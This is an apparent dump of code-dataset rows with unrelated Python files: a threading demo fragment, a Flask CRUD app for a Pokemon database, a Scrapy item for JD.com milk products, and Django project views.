    so a larger delay makes the thread's output appear more slowly.
    """
    remaining = counter
    while remaining:
        time.sleep(delay)
        print("%s: %s" % (threadName, time.ctime(time.time())))
        remaining -= 1
# Shared lock used by myThread.run to serialize print_time calls.
threadLock = threading.Lock()
threads = []
# Two workers: thread2 sleeps twice as long between prints as thread1.
thread1 = myThread(1,"Thread-1",1)
thread2 = myThread(2,"Thread-2",2)
thread1.start()
thread2.start()
# NOTE: the join() calls below are commented out, so the main thread
# does not wait for the workers — "Exiting Main Thread" can print
# before the workers finish (the interpreter still waits for the
# non-daemon threads before actually exiting).
'''
threads.append(thread1)
threads.append(thread2)
for t in threads:
    t.join()
'''
print("Exiting Main Thread")
24,197 | 865ae526c68a98d63981193ad188e44e2a6346b3 | from flask import Flask
from flask import render_template, redirect,request,flash,url_for
from flask_wtf import FlaskForm
from wtforms import StringField , SubmitField, IntegerField
from wtforms.validators import DataRequired
from flask_sqlalchemy import SQLAlchemy
import pymysql
import secrets
import os
from sqlalchemy import or_
# Database credentials come from the environment; any missing variable
# yields None and will produce a malformed connection string.
dbuser=os.environ.get('DBUSER')
dbpass=os.environ.get('DBPASS')
dbhost=os.environ.get('DBHOST')
dbname=os.environ.get('DBNAME')
# Earlier revision read credentials from a local secrets module instead.
#conn="mysql+pymysql://{0}:{1}@{2}/{3}".format(secrets.dbuser,secrets.dbpass,secrets.dbhost,secrets.dbname)
conn="mysql+pymysql://{0}:{1}@{2}/{3}".format(dbuser,dbpass,dbhost,dbname)
app = Flask(__name__)
# SECURITY: hardcoded secret key checked into source — should be loaded
# from the environment like the DB credentials above.
app.config['SECRET_KEY']='SuperSecretKey'
app.config['SQLALCHEMY_DATABASE_URI'] = conn
db=SQLAlchemy(app)
class ysun95_pokemonindex(db.Model):
    """SQLAlchemy model for one pokemon row in the ysun95_pokemonindex table."""
    # Surrogate primary key for each row.
    InstanceID = db.Column(db.Integer,primary_key=True)
    # National pokedex number, stored as text.
    national_index=db.Column(db.String(255))
    pokemon_name=db.Column(db.String(255))
    # Game generation the pokemon was introduced in.
    generation=db.Column(db.String(255))
    def __repr__(self):
        # Pipe-separated dump of every column, used in debugging output.
        return "InstanceID: {0} | national_index: {1} | pokemon_name: {2} | generation: {3}".format(self.InstanceID,self.national_index,self.pokemon_name,self.generation)
class Pokemonindex(FlaskForm):
    """WTForms form mirroring the ysun95_pokemonindex model's columns."""
    # InstanceID has no validator: it is display-only on the update page.
    InstanceID=IntegerField('InstanceID :')
    national_index=StringField('National index number:',validators=[DataRequired()])
    pokemon_name=StringField('name:',validators=[DataRequired()])
    generation=StringField('Generation:',validators=[DataRequired()])
@app.route('/')
def index():
    """Home page: render every pokemon currently in the table."""
    pokemons = ysun95_pokemonindex.query.all()
    return render_template('index.html',
                           pokemontable=pokemons,
                           pageTitle='Sun\'s favourite pokemons')
@app.route('/search',methods=['GET','POST'])
def search():
    """Substring search over name, national index and generation."""
    # A direct GET visit has no search string; go back to the listing.
    if request.method != "POST":
        return redirect('/')
    pattern = "%{}%".format(request.form['search_string'])
    matches = ysun95_pokemonindex.query.filter(
        or_(ysun95_pokemonindex.pokemon_name.like(pattern),
            ysun95_pokemonindex.national_index.like(pattern),
            ysun95_pokemonindex.generation.like(pattern))).all()
    return render_template('index.html',
                           pokemontable=matches,
                           pageTitle="Sun's Pokemon index",
                           legend="Search results")
@app.route('/pokemonindex',methods=['GET','POST'])
def pokemonindex():
    """Render the add-pokemon form; insert a row on a valid submit."""
    form = Pokemonindex()
    if not form.validate_on_submit():
        # First visit or failed validation: (re)show the form.
        return render_template('pokemonindex.html', form=form,
                               pageTitle='Add pokemons')
    new_row = ysun95_pokemonindex(national_index=form.national_index.data,
                                  pokemon_name=form.pokemon_name.data,
                                  generation=form.generation.data)
    db.session.add(new_row)
    db.session.commit()
    return redirect('/')
@app.route('/delete_pokemon/<int:InstanceID>',methods=['GET','POST'])
def delete_pokemon(InstanceID):
    """Delete the given row on POST; always return to the listing."""
    if request.method == 'POST':
        doomed = ysun95_pokemonindex.query.get_or_404(InstanceID)
        db.session.delete(doomed)
        db.session.commit()
    # GET requests (and completed deletes) both land on the home page.
    return redirect('/')
@app.route('/pokemons/<int:InstanceID>',methods=['GET','POST'])
def get_pokemon(InstanceID):
    """Detail page for a single pokemon; 404 when the id is unknown."""
    row = ysun95_pokemonindex.query.get_or_404(InstanceID)
    return render_template('pokemons.html', form=row,
                           pageTitle="Pokemons details",
                           legend='Pokemon Details')
@app.route('/pokemons/<int:InstanceID>/update',methods=['GET','POST'])
def update_pokemon(InstanceID):
    """Edit an existing pokemon.

    GET pre-fills the form from the database row; a valid POST writes
    the edited values back and redirects to the detail page.
    """
    pokemon = ysun95_pokemonindex.query.get_or_404(InstanceID)
    form = Pokemonindex()
    if form.validate_on_submit():
        pokemon.national_index = form.national_index.data
        pokemon.pokemon_name = form.pokemon_name.data
        pokemon.generation = form.generation.data
        db.session.commit()
        return redirect(url_for('get_pokemon', InstanceID=pokemon.InstanceID))
    # GET or failed validation: seed the form with the current values.
    form.InstanceID.data = pokemon.InstanceID
    form.pokemon_name.data = pokemon.pokemon_name
    form.national_index.data = pokemon.national_index
    form.generation.data = pokemon.generation
    # Fixed user-facing typo in the legend ('Updata' -> 'Update').
    return render_template('update_pokemon.html', form=form,
                           pageTitle='Update pokemon', legend='Update a pokemon')
if __name__ == '__main__':
    # Development server only — debug=True enables the interactive
    # debugger and must not be used in production.
    app.run(debug=True)
|
24,198 | 01fa34d80962acfdda42062efc301b5d2734df29 | # -*- coding: utf-8 -*-
# Define here the models for your scraped items
#
# See documentation in:
# https://doc.scrapy.org/en/latest/topics/items.html
import scrapy
class JingdongMilkItem(scrapy.Item):
    """Scrapy item for one milk product listing scraped from JD.com."""

    # Product identity and listing details.
    ID = scrapy.Field()
    name = scrapy.Field()
    shop_name = scrapy.Field()
    link = scrapy.Field()
    price = scrapy.Field()
    # Review counters, broken down by rating bucket.
    CommentsCount = scrapy.Field()
    GoodCount = scrapy.Field()
    GeneralCount = scrapy.Field()
    PoorCount = scrapy.Field()
    AfterCount = scrapy.Field()
|
24,199 | 01531d4bbd961e96bfc2fecea2d3054481b49c7a | from django.http import HttpResponse, HttpResponseRedirect, HttpResponseForbidden
from frat.forms import NewProjectForm
from django.shortcuts import render
from frat.models import Project, Page
from django.contrib.auth.models import User
from django.contrib.auth.decorators import login_required
from frat.cloud_handlers import remove_project_data
from django.template.defaultfilters import slugify
@login_required
def view_project(request, user_name, project_slug):
    """Show one project and its pages, newest page first.

    Removed the unused ``user = request.user`` local; the view only
    needs the project owner looked up from the URL.
    """
    owner = User.objects.get(username=user_name)
    project = Project.objects.get(owner=owner, slug=project_slug)
    pages = Page.objects.filter(project=project).order_by('-created_at')
    return render(request, 'project.html', {'project': project, 'pages': pages})
@login_required
def new_project(request):
    """Create a project owned by the current user.

    GET renders an empty form; a valid POST saves the project (with a
    slug derived from its name) and redirects to its page. An invalid
    POST re-renders the bound form so validation errors are shown.
    """
    user = request.user
    # Check the HTTP method, not the POST dict: ``if request.POST`` is
    # falsy for a POST with an empty body, which silently showed a
    # blank form instead of validation errors.
    if request.method == 'POST':
        form = NewProjectForm(request.POST)
        if form.is_valid():
            project = form.save(commit=False)
            project.owner = user
            project.slug = slugify(project.name)
            project.save()
            form.save_m2m()
            return HttpResponseRedirect('/%s/%s' % (user, project.slug))
    else:
        form = NewProjectForm()
    return render(request, 'new.html', {'form': form, 'type':'project'})
@login_required
def remove_project(request, user_name, project_slug):
    """Delete a project and its stored data; only the owner may do so."""
    owner = User.objects.get(username=user_name)
    # Guard clause: anyone other than the owner is rejected outright.
    if request.user != owner:
        return HttpResponseForbidden('You must be the owner to remove this project')
    project = Project.objects.get(owner=owner, slug=project_slug)
    remove_project_data(project)
    project.delete()
    return HttpResponseRedirect('/%s' % user_name)
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.